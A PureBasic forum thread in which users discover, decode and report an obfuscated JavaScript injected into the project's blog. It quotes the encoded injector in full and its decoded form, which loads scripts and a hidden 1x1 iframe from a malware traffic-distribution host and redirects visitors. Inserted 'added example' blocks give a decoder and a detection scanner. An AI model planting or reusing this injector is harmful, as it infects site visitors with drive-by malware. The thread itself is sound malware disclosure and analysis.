Purebasic Blog

Everything else that doesn't fall into one of the other PB categories.
luis (Addict, Posts: 3895, Joined: Wed Aug 31, 2005 11:09 pm, Location: Italy)

Purebasic Blog

Post by luis »

I noticed this code in the PB Blog, near the </head> tag.


<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/xsjuf%2639%2633%264Dtdsjqu%2631tsd%264E%266D%2633%2633%2C%2633iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G3%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2633%2C%2633%266D%2633%264F%264D%266D0tdsjqu%264F%2633%263%3A%264C%264D0tdsjqu%264F%261B%264Dtdsjqu%264F%261Bjg%2639uzqfpg%2639i%263%3A%264E%264E%2633voefgjofe%2633%263%3A%268C%261%3A%261B%261%3Aepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E%2638iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G4%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2638%2631xjeui%264E2%2631ifjhiu%264E2%2631cpsefs%264E1%2631gsbnfcpsefs%264E1%264F%264D0jgsbnf%264F%2633%263%3A%264C%2631%261B%268E%261Bfmtf%2631jg%2639i/joefyPg%2639%2633iuuq%264B%2633%263%3A%264E%264E1%263%3A%268C%261B%261%3A%261%3Axjoepx/mpdbujpo%264Ei%264C%261B%268E%261B%264D0tdsjqu%264F1')</script>
I didn't try to unescape it and maybe my spider's senses are a little too paranoid, but... are you aware of it? It seems strange to put some code in the page this way, unless you want to hide the real content of the script.
"Have you tried turning it off and on again?"
luis (Addict)

Re: Purebasic Blog

Post by luis »

I'm looking into it (decoding the text)


<script language="javascript">
function dF(s) {
// The last character of s (here the digit '1') is the shift; everything before it is the payload.
var s1=unescape(s.substr(0,s.length-1)); 
var t='';
// Lower every character code by the shift ('-' coerces the one-character string to a number).
for(i=0;i<s1.length;i++)
t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));
// The shifted text is itself percent-encoded; decode it and write it into the page.
document.write(unescape(t));
}
</script>
Then it calls dF with more 'encrypted' text.

The resulting code seems to want to redirect the browser to

http://itsallbreaksoft.net/tds/

The URL exists.

Uhm... trying to execute some CGI code by injecting the call in an IFRAME.

But the code seems missing at the moment; maybe all of this is in preparation of something?

Uhm.... Freak? Fred? I'm starting to believe this is some kind of malware... well, I would say it is!
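For anyone who wants to reproduce the decode without letting the script run, here is an added example, not code from the PureBasic site or from the injected script: a Node.js reimplementation of both layers that returns strings instead of calling document.write. encodeDF() is an inverse written here only to build a test vector (the injector's own tooling is not on this page), and the sample snippet is constructed; it reuses nothing from the thread except the TDS URL.

```javascript
// Added example for this thread: a stand-alone decoder for the two-layer
// obfuscation in the injected snippet. Not code from the PureBasic site or from
// the injected script; dF() is reimplemented to return strings instead of calling
// document.write, so nothing is executed.
//
// Layer 1: document.write(unescape('%3C%73...'))  -> plain percent-encoding
// Layer 2: dF(s): the last character of s is a one-digit shift N; the rest is
//          unescaped, every char code is lowered by N, and the result is
//          unescaped once more (escape(), Caesar shift, escape() on the way in).

function jsUnescape(s) {
  // Same decoding as the legacy unescape(): %XX and %uXXXX sequences.
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, b) => String.fromCharCode(parseInt(u !== undefined ? u : b, 16)));
}

function jsEscape(s) {
  // Same encoding as the legacy escape(): A-Z a-z 0-9 @ * _ + - . / pass through.
  let out = '';
  for (let i = 0; i < s.length; i++) {
    const c = s.charCodeAt(i);
    if (/[A-Za-z0-9@*_+\-.\/]/.test(s[i])) out += s[i];
    else if (c < 256) out += '%' + c.toString(16).toUpperCase().padStart(2, '0');
    else out += '%u' + c.toString(16).toUpperCase().padStart(4, '0');
  }
  return out;
}

function decodeDF(s) {
  // Mirrors dF(): s.substr(s.length-1,1) is a string that '-' coerces to a number.
  const shift = Number(s.slice(-1));
  const s1 = jsUnescape(s.slice(0, -1));
  let t = '';
  for (let i = 0; i < s1.length; i++) t += String.fromCharCode(s1.charCodeAt(i) - shift);
  return jsUnescape(t); // what the original passes to document.write()
}

function encodeDF(text, shift) {
  // Inverse of decodeDF, written here only to build a known test vector
  // (hypothetical: the injector's own tooling is not on the page).
  const e = jsEscape(text);
  let shifted = '';
  for (let i = 0; i < e.length; i++) shifted += String.fromCharCode(e.charCodeAt(i) + shift);
  return jsEscape(shifted) + String(shift);
}

function decodeInjectedScript(snippet) {
  // Pulls both layers out of a <script> shaped like the one in the first post
  // and lists the URLs the decoded code would contact, for blocking/reporting.
  const outer = snippet.match(/unescape\('([^']*)'\)/);
  const inner = snippet.match(/dF\('([^']*)'\)/);
  const stage1 = outer ? jsUnescape(outer[1]) : '';
  const stage2 = inner ? decodeDF(inner[1]) : '';
  const urls = (stage1 + stage2).match(/https?:\/\/[^\s'"<>]+/g) || [];
  return { stage1, stage2, urls };
}

// Constructed sample with the same shape as the injected snippet. Stage 2 is a
// shortened version of what the thread decodes, reusing only the TDS URL from it.
const SAMPLE = "<script language=javascript>document.write(unescape('"
  + jsEscape('<script language="javascript">function dF(s){/* decoder */}</script>')
  + "'));dF('"
  + encodeDF("<iframe src='http://itsallbreaksoft.net/tds/in.cgi?3' width=1 height=1></iframe>", 1)
  + "')</script>";

// The first characters of the real dF() argument quoted in the thread:
console.log(decodeDF('%264Dtdsjqu%264Fepdvnfou/xsjuf1')); // <script>document.write
console.log(decodeInjectedScript(SAMPLE).urls);            // [ 'http://itsallbreaksoft.net/tds/in.cgi?3' ]
```

Run it with node. The `%264Dtdsjqu%264F...` prefix of the real argument decodes to `<script>document.write`, which is exactly why the final stage in this thread starts that way: `%26` is an escaped `&`, one code point above `%`, so each `%XX` of the inner escape() was shifted up by one and escaped again. Pulling the URLs out of both stages this way gives the host to block or report without ever evaluating the payload.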
luis (Addict)

Re: Purebasic Blog

Post by luis »

Checking with the mighty ip2c :wink:

Resolving itsallbreaksoft.net -> 122.115.63.2
Querying servers ...
All servers have replied (13.8 seconds).

Results for 122.115.63.2
from Asia Pacific Network Information Center (APNIC)

Country code : CN
Country name : China
World region : Asia
Org info : Beijingqishangzaixian Shujutongxinkejiyouxiangong

%% [whois.apnic.net node-2]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html

inetnum: 122.115.32.0 - 122.115.63.255
netname: Qishangzaixian
descr: Beijingqishangzaixian Shujutongxinkejiyouxiangongsi
descr: Room 1908-1909, No.32, Beisanhuanxilu
descr: Beijing, China, 100086
country: CN
admin-c: JX107-AP
tech-c: CZ126-AP
mnt-by: MAINT-CNNIC-AP
status: ASSIGNED NON-PORTABLE
changed: ipas@cnnic.cn 20090412
source: APNIC

person: Jia Xiaojie
nic-hdl: JX107-AP
e-mail: jxj@netnic.com.cn
address: Langfang Kaifaqu Daguandi Xikou
phone: +86-10-62190003
fax-no: +86-10-62190007
country: CN
changed: jxj@netnic.com.cn 20091204
mnt-by: MAINT-NEW
source: APNIC

person: Chen Zhuo
nic-hdl: CZ126-AP
e-mail: jxj@netnic.com.cn
address: Langfang Kaifaqu Daguandi Xikou
phone: +86-10-62190003
fax-no: +86-10-62190007
country: CN
changed: jxj@netnic.com.cn 20091204
mnt-by: MAINT-NEW
source: APNIC

inetnum: 122.115.32.0 - 122.115.63.255
netname: Qishangzaixian
descr: Beijingqishangzaixian Shujutongxinkejiyouxiangongsi
descr: Room1908-1909, No.32, Beisanhuanxilu
descr: Beijing, China, 100086
country: CN
admin-c: JX15-CN
tech-c: CZ9-CN
mnt-by: MAINT-CN-PUTIAN
status: ASSIGNED NON-PORTABLE
changed: ipas@cnnic.cn 20090412
source: CNNIC

person: Jia Xiaojie
nic-hdl: JX15-CN
e-mail: jxj@netnic.com.cn
address: Langfang Kaifaqu Daguandi Xikou
phone: +86-10-62190003
fax-no: +86-10-62190007
country: CN
changed: jxj@netnic.com.cn 20091204
mnt-by: MAINT-NEW
source: CNNIC

person: Chen Zhuo
nic-hdl: CZ9-CN
e-mail: jxj@netnic.com.cn
address: Langfang Kaifaqu Daguandi Xikou
phone: +86-10-62190003
fax-no: +86-10-62190007
country: CN
changed: jxj@netnic.com.cn 20091204
mnt-by: MAINT-NEW
source: CNNIC
Rings (Moderator, Posts: 1435, Joined: Sat Apr 26, 2003 1:11 am)

Re: Purebasic Blog

Post by Rings »

Uih, looks definitely like a hack/redirect (attempt) from
our eastern friends.....
Encrypted code has nothing to do in an HTML page......
SPAMINATOR NR.1
gnozal (PureBasic Expert, Posts: 4229, Joined: Sat Apr 26, 2003 8:27 am, Location: Strasbourg / France)

Re: Purebasic Blog

Post by gnozal »

Virustotal results : JS Trojan Downloader (32.50%)
For free libraries and tools, visit my web site (also home of jaPBe V3 and PureFORM).
luis (Addict)

Re: Purebasic Blog

Post by luis »

Dear, old, faithful spider's senses.

I hope I haven't ruined someone's plans :|

This is what the code becomes in the end:


<script>document.write("<script src=\""+"http://itsallbreaksoft.net/tds/in.cgi?2&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+ encodeURIComponent(document.URL)+"&default_keyword=notdefine"+"\"><\/script>");</script>
<script>
if(typeof(h)=="undefined"){	
	document.write("<iframe src='http://itsallbreaksoft.net/tds/in.cgi?3&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+ encodeURIComponent(document.URL)+"&default_keyword=notdefine' width=1 height=1 border=0 frameborder=0></iframe>"); 
}
else if(h.indexOf("http:")==0){
		window.location=h;
}
</script>
It would be nice to check how the code ended up there, to avoid the same thing in the future!

A vulnerability of the blogging service ? Or someone accessed the admin interface with the right login/password ?

Bye.
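Since the question of how the code got there is open, a site owner will at least want to know whether other pages carry the same thing. This added example (not from the PureBasic site or any of the posters) scans saved HTML for script blocks with the traits visible in the decoded payload: document.write(unescape(...)) over a blob that is mostly percent-escapes, a charCodeAt/fromCharCode shift loop, a 1x1 iframe, or a window.location assignment. The two sample pages are constructed here; the stage-2 string only reuses the TDS URL from the thread.

```javascript
// Added example for this thread (not code from the PureBasic site or any poster):
// a scanner to run over saved HTML files to find script blocks shaped like the
// injected one, using the traits seen in the decoded payload.

const HIDDEN_IFRAME = /<iframe\b[^>]*\b(?:width|height)\s*=\s*['"]?[01]\b[^>]*>/i;

function scriptIndicators(body) {
  // Returns the reasons one <script> body looks like the injection, or [].
  const reasons = [];
  if (/document\.write\s*\(\s*unescape\s*\(/.test(body)) reasons.push('document.write(unescape(...))');
  // More encoding than code: the %XX escapes make up over half of the script text.
  const escapes = (body.match(/%[0-9a-fA-F]{2}/g) || []).length;
  if (escapes > 0 && escapes * 3 / body.length > 0.5) reasons.push('mostly percent-escapes (' + escapes + ')');
  if (/String\.fromCharCode\s*\([^)]*charCodeAt/.test(body)) reasons.push('charCode shift decoder');
  if (HIDDEN_IFRAME.test(body)) reasons.push('hidden 1x1 iframe');
  if (/window\.location\s*=(?!=)/.test(body)) reasons.push('window.location redirect');
  return reasons;
}

function findSuspiciousScripts(html) {
  // Walks every <script>...</script> block and reports the line it starts on.
  const findings = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const reasons = scriptIndicators(m[1]);
    if (reasons.length > 0) {
      const line = html.slice(0, m.index).split('\n').length;
      findings.push({ line, reasons });
    }
  }
  return findings;
}

// Constructed sample pages (not real captures): a clean page, and the same page
// with a snippet shaped like the one from the first post added before </head>.
const CLEAN_PAGE = '<html><head>\n'
  + '<script>var counter = 0; function hit() { counter++; }</script>\n'
  + '</head><body>Hello</body></html>';

const blob = Array.from('<script>function dF(s){document.write(unescape(s));}</script>',
  c => '%' + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0')).join('');
const INFECTED_PAGE = CLEAN_PAGE.replace('</head>',
  "<script language=javascript>document.write(unescape('" + blob + "'));dF('%264D1')</script>\n</head>");

// Stage-2 shape from the thread's final decode: a 1x1 iframe or a redirect.
const STAGE2 = 'if(typeof(h)=="undefined"){document.write("<iframe src=\'http://itsallbreaksoft.net/tds/in.cgi?3\' '
  + 'width=1 height=1 border=0 frameborder=0></iframe>");}else if(h.indexOf("http:")==0){window.location=h;}';

console.log(findSuspiciousScripts(CLEAN_PAGE));    // []
console.log(findSuspiciousScripts(INFECTED_PAGE)); // [ { line: 3, reasons: [ 'document.write(unescape(...))', 'mostly percent-escapes (62)' ] } ]
console.log(scriptIndicators(STAGE2));             // [ 'hidden 1x1 iframe', 'window.location redirect' ]
```

Feed it the files from the web root (fs.readFileSync per file) and the line number points at the block to inspect. The 50% escape-ratio cut-off is an arbitrary heuristic, so treat hits as leads to decode and review, the way luis did above, not as verdicts; an injector that switches to a different encoder will need a new indicator.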
djes (Addict, Posts: 1806, Joined: Sat Feb 19, 2005 2:46 pm, Location: Pas-de-Calais, France)

Re: Purebasic Blog

Post by djes »

JS/Wonka trojan :(
Fred (Administrator, Posts: 18553, Joined: Fri May 17, 2002 4:39 pm, Location: France)

Re: Purebasic Blog

Post by Fred »

It's removed but it's very weird :?
Inf0Byt3 (PureBasic Fanatic, Posts: 2236, Joined: Fri Dec 09, 2005 12:15 pm, Location: Elbonia)

Re: Purebasic Blog

Post by Inf0Byt3 »

I've had some problems too with something that looked like this. After logging in to my site's FTP account I noticed a folder that had a random name. Inside this folder there was a PHP script file and a text file with some garbage inside. So I searched the internet with parts of that script and found out its name: adsttnmq1/sdioyslkjs2 attack (because it injects those strings in web pages). The strange thing is that I don't use scripts on my website or PHP pages, except for the contact Perl script that is considered secure. So the only gate could be the one described on http://www.esuli.it/2009/03/24/adsttnmq ... /comments/ , that is, through a flaw in the hosting management software or through an FTP sniff attack. Lucky me, it only modified pages for spam propagation and it wasn't something more dangerous.

The best thing to do is to send the malicious files to the hosting company; maybe they will find the breach...
None are more hopelessly enslaved than those who falsely believe they are free. (Goethe)
Innesoft (Enthusiast, Posts: 105, Joined: Mon Jan 18, 2010 10:30 am, Location: UK)

Re: Purebasic Blog

Post by Innesoft »

I went on a site a few months ago with this kind of injection attack. I strongly advise anyone who's been on the page to change all their FTP logins/passwords etc., as it propagates on your machine and across servers too, by crawling your local machine for FTP login credentials via a silent install, and downloads some very nasty stuff.
Joakim Christiansen (Addict, Posts: 2452, Joined: Wed Dec 22, 2004 4:12 pm, Location: Norway)

Re: Purebasic Blog

Post by Joakim Christiansen »

Fred wrote: It's removed but it's very weird :?
Well, not too weird! WordPress is a popular blog so of course there will be people doing all they can to find exploits.
http://www.marrowbones.com/commons/tech ... _word.html
I like logic, hence I dislike humans but love computers.